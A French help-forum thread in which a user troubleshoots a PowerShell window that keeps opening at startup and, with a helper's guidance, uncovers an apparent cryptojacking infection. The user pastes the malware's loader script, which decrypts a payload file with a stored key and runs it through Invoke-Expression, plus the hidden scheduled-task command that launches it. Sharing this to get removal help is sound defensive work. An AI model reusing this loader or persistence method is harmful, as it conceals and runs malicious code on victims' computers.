Fenetre power shell Fermé

Question

Bonjour,

j'ai une fenêtre power shell qui s'ouvre au démarrage , je crains que ce soit un virus ?

fabul · Answer

Salut,

Tu peux analyser et supprimer des programmes nuisibles et virus avec RegRun Reanimator

https://greatis.com/security/reanimator.html

> Fix Problems

> Fix Malware Issues

Il faut regarder dans les onglets en haut pour les types d'items vus.

Attention, il est important de bien trier, par recherches et déductions et/ou analyses VirusTotal* pour ne supprimer que des virus ou inutiles, parce qu'il détecte tout et n'importe quoi, bon ou pas, important ou pas, ce n'est pas un "antivirus", mais plutôt un outil d'analyse qui permet de voir des détails techniques sur des éléments possiblement actifs, des fois bons, des fois mauvais.

Il montre des détails comme les types, les noms et la localisation des fichiers etc. ce qui sert des indices souvent concrets.

Que ce soit marqué en rouge, jaune, bleu ou vert, c'est l'utilisateur/utilisatrice qui doit juger de la pertinence de ce qu'il détecte.

Cocher les items à supprimer et non les autres et cliquer sur le bouton rouge, dans toutes les sections ou il y a à supprimer, puis aller à Finish! et cliquer le bouton pour redémarrer Windows.

Si il ne détecte pas assez tu peux utiliser le bouton Filter Set ou le Inspection Mode pour tout voir.

Ou On-Line Multi-Antivirus Scan

Ou en fermant la première fenêtre de Reanimator par le X en haut à droite, et l'onglet Reanimator > Anti Spyware Full Check...

-----------------------------------------------------­------------------------­-----------------------------------------------

Le programme VirusTotal Uploader *Download the App here*

https://support.virustotal.com/hc/en-us/articles/115002179065-Desktop-Apps

Pour (Un fichier) > Clic droit > Envoyer vers > VirusTotal

(Afficher les fichiers cachés si il faut dans Affichage > Options > Affichage)

Pour avoir les résultats en direct en ligne d'analyses du fichier par une soixantaine de moteurs antivirus, en plus de l'onglet Détails pour voir si le fichier est signé et vérifié ou pas etc.

On peut utiliser l'option Reupload pour obtenir une nouvelle analyse du fichier en cas de fichier récent peu analysé.

-----------------------------------------------------­------------------------­-----------------------------------------------

Tu peux faire du ménage dans les éléments invalides et inutiles en démarrage avec Autoruns

Tu peux télécharger Autoruns ici, extraire tout dans un nouveau dossier, et l'exécuter en tant qu'administrateur.

https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns

Prends ton temps, regardes tous les détails, fais des recherches.

Dans les onglets "Logon" et "Scheduled Tasks", tu peux désactiver ou supprimer du démarrage automatique des éléments tiers inutiles pas de Microsoft ou Windows importants, soit en les décochant, ou par clic droit > Delete.

Regarder l'onglet "Services", mais ne pas les désactiver si parfois utiles, c'est mieux de les passer en mode "Manuel" (Pour démarrer à la demande) avec services.msc de Windows, par clic droit sur le bouton Démarrer > Exécuter: services.msc

Avec Autoruns tu as la liste des services Non Windows, alors ça aide.

Les changements seront pris en compte en redémarrant Windows.

Après dis nous, que tu aie encore besoin d'aide ou pas...

@+

gilcc29 · Answer

Bonsoir, bien trouvé powershell suspect avec reanimator , mais si je le fix il s'arrête et se relance automatiquement quelques secondes après.
Avec autoruns rien vu de suspect.
Pour le reste ca dépasse mes compétences
Merci

fabul · Answer

Tu as bien redémarré après le Fix ?

Il n'y a pas d'items suspects que tu n'as pas supprimé ?

Si tu veux que je regarde, malgré que c'est un peu compliqué, manque d'habitude de regarder avec des logs.

Démarres Reanimator

Cliques sur l'onglet Send Report > Make Report now

Quand une fenêtre Upload RegRunLog to Support Center s'ouvre, fermes la.

Envoies le rapport crée sur le bureau nommé regrunlog.txt sur le site cjoint.com https://www.cjoint.com/

Et fournis nous le lien en retour.

gilcc29 · Answer

le voici
https://www.cjoint.com/c/MHjrnjmjjwD

fabul · Answer

As tu désactivé des programmes non Windows avec Autoruns ?

Tu as des tâches planifiées de programmes qui peuvent provoquer ça peut être.

Je continue de visionner ton log.

fabul · Answer

Essaies de supprimer ce dosier C:\USERS\GILLE\APPDATA\LOCAL\CACHE\

Reanimator ne te l'indique pas ? (Dans Unwanted Files)

Tu peux afficher les dossiers cachés dans Affichage > Visualiser > Affichage.

Puis si tu n'as pas modifié ton fichier hosts toi même, utilises RSHosts pour restaurer ton fichier hosts

https://toolslib.net/downloads/viewdownload/15-rsthosts

Tu peux voir son contenu dans C:\Windows\Systrm32\Drivers\etc\hosts

gilcc29 · Answer

Bonsoir ,rien de special dans host
dossier cache supprimé mais pas de changement...
je suppose que power shell est lancé pour réaliser une liste de commandes 
pas moyen de savoir quelles commande et lancé par quel programme ?        
Bonne soirée

fabul · Answer

Dana les sections Logon et Scheduled Tasks de Autoruns, décoches tout ce qui n'est pas de Microsoft ou Windows

Ne touches pas à la section Installed Components de Logon, (J'ai Edge c'est tout) mais le reste.

fabul · Answer

PS: Ça peut venir de BITS

Supprimes la file d'attente de BITS avec ce programme

https://toolslib.net/downloads/viewdownload/21-winupdatefix/

gilcc29 · Answer

Hello
tout cela fait mais ca revient toujours...  du coup j'ai recoché les entrées sur autoruns
voila ce que me met reanimator
https://www.cjoint.com/c/MHjuUumt6fD

fabul · Answer

C'est le processus du fichier légitime dans la section processus.

C'est ce qui le démarre qu'il faudrait trouver.

Pourrais tu photographier ton écran au démarrage qu'on voie si il y a de quoi écrit dans la fenêtre de PowerShell ?

fabul · Answer

Dans Reanimator, dans Read Report (L'équivalent de Anti Spyware Full Check) je vois:

C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.EXE" -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\WINDOWS\mid.ps1

Tu peux trouver ce fichier caché ?
C:\WINDOWS\mid.ps1

En affichant tes fichiers cachés + tes fichiers protégés dans l'explorateur ?

Dans Affichage > Options > Affichage

gilcc29 · Answer

je l'ai trouvé et supprimé
ca se lance toujours mais c'est sans doute fermé aussitot car je le vois plus dans la liste des taches en cours dans gestionnaire des taches et plus rien dans reanimator
rien à voir dans fenetre power shell :
https://www.cjoint.com/c/MHjvonpbzcD
un peu pertubant parce que j'apercois la fenetre powershell qui n'arrete pas de se lancer à vitesse grand v toutes les 10 secondes (à peine visible)
il y a aussi des fichiers mid.bin que je n'ai pas touché

fabul · Answer

mib.bin est un fichier légitime Je n'ai pas mid.bin par contre.

Tu peux l'analyser sur VirusTotal https://www.virustotal.com/gui/home/upload

Regardes avec Process Explorer ou encore mieux avec Process Monitor Trouvables ici

https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer

https://learn.microsoft.com/en-us/sysinternals/downloads/procmon

Tu peux ajouter un filtre dans Process Monitor

gilcc29 · Answer

virus total m'annonce que mid.bin est safe...

fabul · Answer

Process Explorer ou Process Monitor t'ont-il aidé ?

J'espère, sinon je ne sais plus quoi:

Ça part ça, tu peux supprimer CCleaner partout dans Autoruns

En utilisant la case Filter

gilcc29 · Answer

ben pas vraiment je sais pas m'en servir

gilcc29 · Answer

voila ce que contient mid :
function Decrypt-Script($encryptedScriptPath, $keyFileName) {
  if (-not (Test-Path $encryptedScriptPath)) {
    Throw ""
  }

$keyFilePath = Join-Path -Path $env:windir -ChildPath ($keyFileName)
  
  if (-not (Test-Path $keyFilePath)) {
    Throw ""
  }

$encryptedContent = Get-Content $encryptedScriptPath -Raw
  $key = Get-Content $keyFilePath -Raw

$secure = $encryptedContent | ConvertTo-SecureString -Key (([int[]][char[]]$key)[0..15])
  $script = [Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR($secure))

return $script
}

$encryptedScriptPath = Join-Path -Path $env:windir -ChildPath "mid.bin"
$keyFileName = "key"

$decryptedScript = Decrypt-Script $encryptedScriptPath $keyFileName

Invoke-Expression $decryptedScript

J'ai tout remis et powershell se lance et reste actif
donc revenu au point de départ...
il y a quelque chose qui fait appel à Mid.ps1 sans arrêt

gilcc29 · Answer

si je remets mid.ps1 sans key il se relance sans arrêt  et ne reste pas actif    
si je mets key il se lance et reste actif en tache de fond
key contient : q9ETwHj1uV9UEnKxtPRy ??

fabul · Answer

Avec Process Explorer, si tu fermes des processus (Pas Microsoft) avec Kill Process Tree

Il y en a un qui fait que ça arrête ?

Dans Process Monitor, tu vois un processus qui crée une instance  toutes les 10 secondes à part PowerShell ?

Tu peux dans Filter mettre > Result > Is Not > SUCCESS pour commencer

(Quand il n'y a pas le fichier script .ps1)

gilcc29 · Answer

HKCU\Software\Classes\CLSID\{56AD4C5D-B908-4F85-8FF1-7940C29B3BCF}\Instance
     HKCR\CLSID\{56AD4C5D-B908-4F85-8FF1-7940C29B3BCF}\Instance

gilcc29 · Answer

avec explorer.exe

fabul · Answer

C'est un peu chinois pour moi aussi.

Si tu fais Exécuter : WINVER

Ça t'affiche quelle version de Windows ? 22H2 ?

Serait-tu prêt à réinstaller Windows ?

Si il n'est pas à jour ça serait l'occasion d'installer la dernière version.

Je vais re rediriger ton sujet dans la section Windows, parce que c'est probablement pas une question de virus.

fabul · Answer

Par Rechercher ouvres %AppData% (Roaming)

Et regardes si il y a un .exe qui traine

fabul · Answer

Puis après une recherche désactives ce qui ressemble à Task: {AB05B368-13F7-468A-9B30-E553C06B5449} - System32\Tasks\Microsoft\Windows\Bluetooth\UninstallDeviceTask => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [492032 2023-05-11] (Microsoft Windows -> Microsoft Corporation) -> -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\WINDOWS\mid.ps1
C:\WINDOWS\mid.ps1

avec Autoruns dans Scheduled Tasks

Parce que j'ai vu un cas similaire tout récent ici:

https://forum.malekal.com/viewtopic.php?t=72915

gilcc29 · Answer

Merci pour tout ,faute de mieux,je réinstalle windows...

gilcc29 · Answer

Bonjour
je relance une install de windows ,ca sera plus simple

gilcc29 · Answer

bonjour ,je relance une install de windows...

Itharius · Answer

Bonjour, je viens de voir une video sur tik tok qui parle de cryptojacking. les fichiers sont dans C:/Windows: mid.bin, key, mid.ps1 et Dlhost.exe Le virus s'installe suite à une conversion mp3 en ligne.

Fenetre power shell

29 réponses

Discussions similaires